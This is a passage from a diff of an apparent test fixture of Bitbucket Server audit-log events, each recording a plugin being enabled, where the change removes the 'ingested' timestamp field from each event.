enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-crowd-spi\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-crowd-spi\"}]}", "type": "info", "kind": "event" @@ -7479,7 +7351,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867808125Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.656Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-contributing-guidelines\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-contributing-guidelines\"}]}", "type": "info", "kind": "event" @@ -7533,7 +7404,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867809092Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.644Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-connect-support\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-connect-support\"}]}", "type": "info", "kind": "event" @@ -7587,7 +7457,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867810059Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.643Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.jwt.jwt-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.2.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.jwt.jwt-plugin\"}]}", "type": "info", "kind": "event" @@ -7641,7 +7510,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867810946Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.560Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-compare\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-compare\"}]}", "type": "info", "kind": "event" @@ -7695,7 +7563,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867811931Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.996Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-comment-properties\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-comment-properties\"}]}", "type": "info", "kind": "event" @@ -7749,7 +7616,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867813049Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.992Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-comment-likes\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-comment-likes\"}]}", "type": "info", "kind": "event" @@ -7803,7 +7669,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867814049Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.967Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-emoticons\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-emoticons\"}]}", "type": "info", "kind": "event" @@ -7857,7 +7722,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867815001Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.825Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-code-insights\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-code-insights\"}]}", "type": "info", "kind": "event" @@ -7911,7 +7775,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867815906Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.800Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-cluster-info\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-cluster-info\"}]}", "type": "info", "kind": "event" @@ -7965,7 +7828,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867816930Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.796Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-client-web-fragments\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-client-web-fragments\"}]}", "type": "info", "kind": "event" @@ -8019,7 +7881,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867817971Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.732Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-bundled-hooks\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-bundled-hooks\"}]}", "type": "info", "kind": "event" @@ -8073,7 +7934,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867818963Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.340Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-build-jenkins\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-build-jenkins\"}]}", "type": "info", "kind": "event" @@ -8127,7 +7987,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867820026Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.068Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-build-feature\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-build-feature\"}]}", "type": "info", "kind": "event" @@ -8181,7 +8040,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867821045Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.008Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-build-bamboo\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-build-bamboo\"}]}", "type": "info", "kind": "event" @@ -8235,7 +8093,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867822001Z", "original": "{\"timestamp\":\"2021-11-27T17:29:08.877Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-build\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-build\"}]}", "type": "info", "kind": "event" @@ -8289,7 +8146,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867822954Z", "original": "{\"timestamp\":\"2021-11-27T17:29:08.836Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-branch\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-branch\"}]}", "type": "info", "kind": "event" @@ -8343,7 +8199,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867823955Z", "original": "{\"timestamp\":\"2021-11-27T17:29:08.642Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.integration.jira.jira-integration-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.integration.jira.jira-integration-plugin\"}]}", "type": "info", "kind": "event" @@ -8397,7 +8252,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867824909Z", "original": "{\"timestamp\":\"2021-11-27T17:29:08.597Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-ref-restriction\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-ref-restriction\"}]}", "type": "info", "kind": "event" @@ -8451,7 +8305,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867825815Z", "original": "{\"timestamp\":\"2021-11-27T17:29:07.438Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.stash.ssh-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.stash.ssh-plugin\"}]}", "type": "info", "kind": "event" @@ -8505,7 +8358,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867826756Z", "original": "{\"timestamp\":\"2021-11-27T17:29:07.326Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-authentication\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-authentication\"}]}", "type": "info", "kind": "event" @@ -8559,7 +8411,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867827655Z", "original": "{\"timestamp\":\"2021-11-27T17:29:07.312Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-audit\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-audit\"}]}", "type": "info", "kind": "event" @@ -8613,7 +8464,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867828561Z", "original": "{\"timestamp\":\"2021-11-27T17:29:07.281Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-announcement-banner\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-announcement-banner\"}]}", "type": "info", "kind": "event" @@ -8667,7 +8517,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867829602Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.974Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-analytics-whitelist\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-analytics-whitelist\"}]}", "type": "info", "kind": "event" @@ -8721,7 +8570,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867830541Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.973Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-access-tokens\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-access-tokens\"}]}", "type": "info", "kind": "event" @@ -8775,7 +8623,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867831477Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.941Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-rest\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-rest\"}]}", "type": "info", "kind": "event" @@ -8829,7 +8676,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867832493Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.922Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-webhooks\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-webhooks\"}]}", "type": "info", "kind": "event" @@ -8883,7 +8729,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867833552Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.893Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin 